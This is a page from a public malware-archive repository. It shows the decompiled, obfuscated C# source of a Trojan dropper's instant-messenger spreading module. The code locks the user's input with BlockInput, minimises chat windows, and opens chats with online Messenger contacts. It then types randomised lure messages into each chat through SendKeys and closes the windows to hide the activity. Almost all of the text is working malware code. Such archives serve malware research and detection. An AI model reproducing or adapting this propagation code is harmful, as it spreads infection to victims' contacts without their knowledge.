ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-22 19:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
71cdcf7dce
MalwareSourceCode/MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_000E/_0006.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

343 lines
14 KiB
C#
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// Decompiled with JetBrains decompiler
// Type: .
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
using \u0003;
using \u0006;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using System.Text.RegularExpressions;
using System.Threading;
using System.Windows.Forms;
namespace \u000E
{
internal sealed class \u0006
{
[NonSerialized]
internal static \u0001.\u0002 \u0001;
public static string[] \u0001;
public static string[] \u0002;
public static bool \u0001;
public static string \u0001;
[DllImport("user32.dll", EntryPoint = "BlockInput", CharSet = CharSet.Auto)]
private static extern bool \u000F([MarshalAs(UnmanagedType.Bool), In] bool fBlockIt);
[DllImport("user32.dll", EntryPoint = "PostMessage", SetLastError = true)]
private static extern bool \u000F([In] IntPtr obj0, [In] uint obj1, [In] IntPtr obj2, [In] IntPtr obj3);
[DllImport("user32.dll", EntryPoint = "FindWindowEx", SetLastError = true)]
private static extern IntPtr \u000F([In] IntPtr obj0, [In] IntPtr obj1, [In] string obj2, [In] IntPtr obj3);
[DllImport("user32.dll", EntryPoint = "ShowWindow")]
private static extern bool \u000F([In] IntPtr obj0, [In] int obj1);
[DllImport("user32.dll", EntryPoint = "FindWindow", SetLastError = true)]
private static extern IntPtr \u000F([In] IntPtr obj0, [In] string obj1);
public static void \u000F([In] string[] obj0, [In] string[] obj1)
{
if (\u000E.\u0006.\u0001)
return;
if (!\u000E.\u0006.\u000F())
return;
try
{
\u000E.\u0006.\u0001 = obj0;
\u000E.\u0006.\u0002 = obj1;
// ISSUE: method pointer
((\u0004.\u0001) new \u0008()).add_OnContactStatusChange(new \u0005((object) null, (UIntPtr) __methodptr(\u000F)));
\u000E.\u0006.\u0001 = true;
}
catch
{
}
}
private static void \u000F([In] object obj0, [In] \u0002.\u0007 obj1)
{
\u0003.\u0006 vContact = (\u0003.\u0006) obj0;
if (obj1 != \u0002.\u0007.\u0003 || vContact.IsSelf || \u000E.\u0006.\u000F(vContact.SigninName) || vContact.Blocked)
return;
if (\u000E.\u0006.\u0010(vContact.SigninName))
return;
try
{
\u0007.\u0004 obj = (\u0007.\u0004) new \u0008();
string str1 = \u000E.\u0006.\u000F(vContact.FriendlyName);
foreach (\u0003.\u0006 myContact in (\u0003.\u0007) ((\u0003.\u0004) obj).MyContacts)
{
IntPtr num = \u000E.\u0006.\u000F(IntPtr.Zero, \u000E.\u0006.\u000F(myContact.FriendlyName) + \u000E.\u0006.\u0001(4127) + myContact.SigninName + \u000E.\u0006.\u0001(1879));
try
{
\u000E.\u0006.\u000F(num, 274U, (IntPtr) 61536, IntPtr.Zero);
}
catch
{
}
}
foreach (\u0003.\u0006 myContact in (\u0003.\u0007) ((\u0003.\u0004) obj).MyContacts)
{
IntPtr num = \u000E.\u0006.\u000F(IntPtr.Zero, myContact.FriendlyName + \u000E.\u0006.\u0001(4127) + myContact.SigninName + \u000E.\u0006.\u0001(1879));
try
{
\u000E.\u0006.\u000F(num, 274U, (IntPtr) 61536, IntPtr.Zero);
}
catch
{
}
}
\u000E.\u0006.\u000F(true);
Thread.Sleep(1000);
((\u0003.\u0004) obj).\u0002((object) vContact);
IntPtr num1 = \u000E.\u0006.\u000F(IntPtr.Zero, vContact.FriendlyName + \u000E.\u0006.\u0001(4127) + vContact.SigninName + \u000E.\u0006.\u0001(1879));
if (num1.ToString() == \u000E.\u0006.\u0001(1939))
num1 = \u000E.\u0006.\u000F(IntPtr.Zero, str1 + \u000E.\u0006.\u0001(4127) + vContact.SigninName + \u000E.\u0006.\u0001(1879));
\u000E.\u0006.\u000F(num1, 0);
\u000E.\u0006.\u000F(\u000E.\u0006.\u000F(num1, IntPtr.Zero, \u000E.\u0006.\u0001(4132), IntPtr.Zero), IntPtr.Zero, \u000E.\u0006.\u0001(4153), IntPtr.Zero);
string str2 = \u000E.\u0006.\u0001[\u000E.\u0006.\u000F(0, \u000E.\u0006.\u0001.Length)];
string newValue = \u000E.\u0006.\u0002[\u000E.\u0006.\u000F(0, \u000E.\u0006.\u0002.Length)].Replace(\u000E.\u0006.\u0001(4170), ((\u0003.\u0004) obj).MySigninName).Replace(\u000E.\u0006.\u0001(4183), vContact.SigninName).Replace(\u000E.\u0006.\u0001(4196), ((\u0003.\u0004) obj).MyFriendlyName).Replace(\u000E.\u0006.\u0001(4209), vContact.FriendlyName);
SendKeys.SendWait(str2.Replace(\u000E.\u0006.\u0001(4170), ((\u0003.\u0004) obj).MySigninName).Replace(\u000E.\u0006.\u0001(4183), vContact.SigninName).Replace(\u000E.\u0006.\u0001(4196), ((\u0003.\u0004) obj).MyFriendlyName).Replace(\u000E.\u0006.\u0001(4209), vContact.FriendlyName).Replace(\u000E.\u0006.\u0001(4222), newValue));
SendKeys.SendWait(\u000E.\u0006.\u0001(4231));
Process[] processes = Process.GetProcesses();
for (int index = 0; index < processes.Length; ++index)
{
try
{
if (processes[index].MainWindowTitle.Contains(vContact.SigninName))
processes[index].CloseMainWindow();
}
catch
{
}
}
\u000E.\u0006.\u000F(false);
}
catch
{
\u000E.\u0006.\u000F(false);
}
}
private static bool \u000F([In] string obj0) => new List<string>()
{
\u000E.\u0006.\u0001(4244),
\u000E.\u0006.\u0001(4277),
\u000E.\u0006.\u0001(4306),
\u000E.\u0006.\u0001(4339),
\u000E.\u0006.\u0001(4368),
\u000E.\u0006.\u0001(4397),
\u000E.\u0006.\u0001(4426),
\u000E.\u0006.\u0001(4451),
\u000E.\u0006.\u0001(4484),
\u000E.\u0006.\u0001(4517),
\u000E.\u0006.\u0001(4554),
\u000E.\u0006.\u0001(4595),
\u000E.\u0006.\u0001(4620),
\u000E.\u0006.\u0001(4653),
\u000E.\u0006.\u0001(4686),
\u000E.\u0006.\u0001(4731),
\u000E.\u0006.\u0001(4768),
\u000E.\u0006.\u0001(4801),
\u000E.\u0006.\u0001(4838),
\u000E.\u0006.\u0001(4867),
\u000E.\u0006.\u0001(4900),
\u000E.\u0006.\u0001(4929),
\u000E.\u0006.\u0001(4958),
\u000E.\u0006.\u0001(4995),
\u000E.\u0006.\u0001(5032),
\u000E.\u0006.\u0001(5065),
\u000E.\u0006.\u0001(5094),
\u000E.\u0006.\u0001(5135),
\u000E.\u0006.\u0001(5168),
\u000E.\u0006.\u0001(5032),
\u000E.\u0006.\u0001(5201),
\u000E.\u0006.\u0001(5242),
\u000E.\u0006.\u0001(5283),
\u000E.\u0006.\u0001(5316),
\u000E.\u0006.\u0001(5337),
\u000E.\u0006.\u0001(5358),
\u000E.\u0006.\u0001(5383),
\u000E.\u0006.\u0001(5420),
\u000E.\u0006.\u0001(5453),
\u000E.\u0006.\u0001(5478),
\u000E.\u0006.\u0001(5507),
\u000E.\u0006.\u0001(5544),
\u000E.\u0006.\u0001(5573),
\u000E.\u0006.\u0001(5606),
\u000E.\u0006.\u0001(5639),
\u000E.\u0006.\u0001(5680),
\u000E.\u0006.\u0001(5705),
\u000E.\u0006.\u0001(5742),
\u000E.\u0006.\u0001(5775),
\u000E.\u0006.\u0001(5420),
\u000E.\u0006.\u0001(5804),
\u000E.\u0006.\u0001(5837),
\u000E.\u0006.\u0001(5862),
\u000E.\u0006.\u0001(5891),
\u000E.\u0006.\u0001(5928),
\u000E.\u0006.\u0001(5961),
\u000E.\u0006.\u0001(5994),
\u000E.\u0006.\u0001(6027),
\u000E.\u0006.\u0001(6072)
}.Contains(obj0);
private static bool \u0010([In] string obj0)
{
foreach (string str in new List<string>()
{
\u000E.\u0006.\u0001(6117),
\u000E.\u0006.\u0001(6126),
\u000E.\u0006.\u0001(6135),
\u000E.\u0006.\u0001(6156),
\u000E.\u0006.\u0001(6177),
\u000E.\u0006.\u0001(6198),
\u000E.\u0006.\u0001(6219),
\u000E.\u0006.\u0001(6244),
\u000E.\u0006.\u0001(6265),
\u000E.\u0006.\u0001(6286),
\u000E.\u0006.\u0001(6307),
\u000E.\u0006.\u0001(6328),
\u000E.\u0006.\u0001(6345),
\u000E.\u0006.\u0001(6362),
\u000E.\u0006.\u0001(6379),
\u000E.\u0006.\u0001(6396),
\u000E.\u0006.\u0001(6244),
\u000E.\u0006.\u0001(6265),
\u000E.\u0006.\u0001(6286),
\u000E.\u0006.\u0001(6328),
\u000E.\u0006.\u0001(6345),
\u000E.\u0006.\u0001(6345),
\u000E.\u0006.\u0001(6362),
\u000E.\u0006.\u0001(6417),
\u000E.\u0006.\u0001(6434),
\u000E.\u0006.\u0001(6459),
\u000E.\u0006.\u0001(6476),
\u000E.\u0006.\u0001(6521),
\u000E.\u0006.\u0001(6550),
\u000E.\u0006.\u0001(6571),
\u000E.\u0006.\u0001(6596),
\u000E.\u0006.\u0001(6621),
\u000E.\u0006.\u0001(6646),
\u000E.\u0006.\u0001(6667),
\u000E.\u0006.\u0001(6680),
\u000E.\u0006.\u0001(6689),
\u000E.\u0006.\u0001(6706),
\u000E.\u0006.\u0001(6727)
})
{
if (obj0.EndsWith(str))
return true;
}
return false;
}
private static string \u000F([In] string obj0)
{
string pattern = \u000E.\u0006.\u0001(6740);
return Regex.Replace(obj0, pattern, string.Empty);
}
public static void \u000F([In] string[] obj0, [In] string[] obj1, [In] int obj2)
{
if (!\u000E.\u0006.\u000F())
return;
try
{
\u0007.\u0004 obj = (\u0007.\u0004) new \u0008();
((\u0003.\u0004) obj).MyStatus = \u0002.\u0007.\u0004;
foreach (\u0003.\u0006 myContact1 in (\u0003.\u0007) ((\u0003.\u0004) obj).MyContacts)
{
if (myContact1.Status != \u0002.\u0007.\u0002 && !myContact1.IsSelf && !\u000E.\u0006.\u000F(myContact1.SigninName) && !myContact1.Blocked)
{
if (!\u000E.\u0006.\u0010(myContact1.SigninName))
{
try
{
string str1 = \u000E.\u0006.\u000F(myContact1.FriendlyName);
foreach (\u0003.\u0006 myContact2 in (\u0003.\u0007) ((\u0003.\u0004) obj).MyContacts)
{
IntPtr num = \u000E.\u0006.\u000F(IntPtr.Zero, \u000E.\u0006.\u000F(myContact2.FriendlyName) + \u000E.\u0006.\u0001(4127) + myContact2.SigninName + \u000E.\u0006.\u0001(1879));
try
{
\u000E.\u0006.\u000F(num, 274U, (IntPtr) 61536, IntPtr.Zero);
}
catch
{
}
}
foreach (\u0003.\u0006 myContact3 in (\u0003.\u0007) ((\u0003.\u0004) obj).MyContacts)
{
IntPtr num = \u000E.\u0006.\u000F(IntPtr.Zero, myContact3.FriendlyName + \u000E.\u0006.\u0001(4127) + myContact3.SigninName + \u000E.\u0006.\u0001(1879));
try
{
\u000E.\u0006.\u000F(num, 274U, (IntPtr) 61536, IntPtr.Zero);
}
catch
{
}
}
\u000E.\u0006.\u000F(true);
Thread.Sleep(1000);
((\u0003.\u0004) obj).\u0002((object) myContact1);
IntPtr num1 = \u000E.\u0006.\u000F(IntPtr.Zero, myContact1.FriendlyName + \u000E.\u0006.\u0001(4127) + myContact1.SigninName + \u000E.\u0006.\u0001(1879));
if (num1.ToString() == \u000E.\u0006.\u0001(1939))
num1 = \u000E.\u0006.\u000F(IntPtr.Zero, str1 + \u000E.\u0006.\u0001(4127) + myContact1.SigninName + \u000E.\u0006.\u0001(1879));
\u000E.\u0006.\u000F(num1, 0);
\u000E.\u0006.\u000F(\u000E.\u0006.\u000F(num1, IntPtr.Zero, \u000E.\u0006.\u0001(4132), IntPtr.Zero), IntPtr.Zero, \u000E.\u0006.\u0001(4153), IntPtr.Zero);
string str2 = obj0[\u000E.\u0006.\u000F(0, obj0.Length)];
string newValue = obj1[\u000E.\u0006.\u000F(0, obj1.Length)].Replace(\u000E.\u0006.\u0001(4170), ((\u0003.\u0004) obj).MySigninName).Replace(\u000E.\u0006.\u0001(4183), myContact1.SigninName).Replace(\u000E.\u0006.\u0001(4196), ((\u0003.\u0004) obj).MyFriendlyName).Replace(\u000E.\u0006.\u0001(4209), myContact1.FriendlyName);
SendKeys.SendWait(str2.Replace(\u000E.\u0006.\u0001(4170), ((\u0003.\u0004) obj).MySigninName).Replace(\u000E.\u0006.\u0001(4183), myContact1.SigninName).Replace(\u000E.\u0006.\u0001(4196), ((\u0003.\u0004) obj).MyFriendlyName).Replace(\u000E.\u0006.\u0001(4209), myContact1.FriendlyName).Replace(\u000E.\u0006.\u0001(4222), newValue));
SendKeys.SendWait(\u000E.\u0006.\u0001(4231));
Process[] processes = Process.GetProcesses();
for (int index = 0; index < processes.Length; ++index)
{
try
{
if (processes[index].MainWindowTitle.Contains(myContact1.SigninName))
processes[index].CloseMainWindow();
}
catch
{
}
}
\u000E.\u0006.\u000F(false);
Thread.Sleep(obj2);
}
catch
{
\u000E.\u0006.\u000F(false);
}
}
}
}
((\u0003.\u0004) obj).MyStatus = \u0002.\u0007.\u0003;
}
catch
{
\u000E.\u0006.\u000F(false);
}
\u000E.\u0006.\u000F(false);
}
private static int \u000F([In] int obj0, [In] int obj1) => new Random().Next(obj0, obj1);
public static bool \u000F() => File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + \u000E.\u0006.\u0001(6753));
static \u0006()
{
\u0001.\u0003.\u000F();
\u000E.\u0006.\u0001 = (string[]) null;
\u000E.\u0006.\u0002 = (string[]) null;
\u000E.\u0006.\u0001 = false;
\u000E.\u0006.\u0001 = \u000E.\u0006.\u0001(1001);
}
}
}
Reference in New Issue View Git Blame Copy Permalink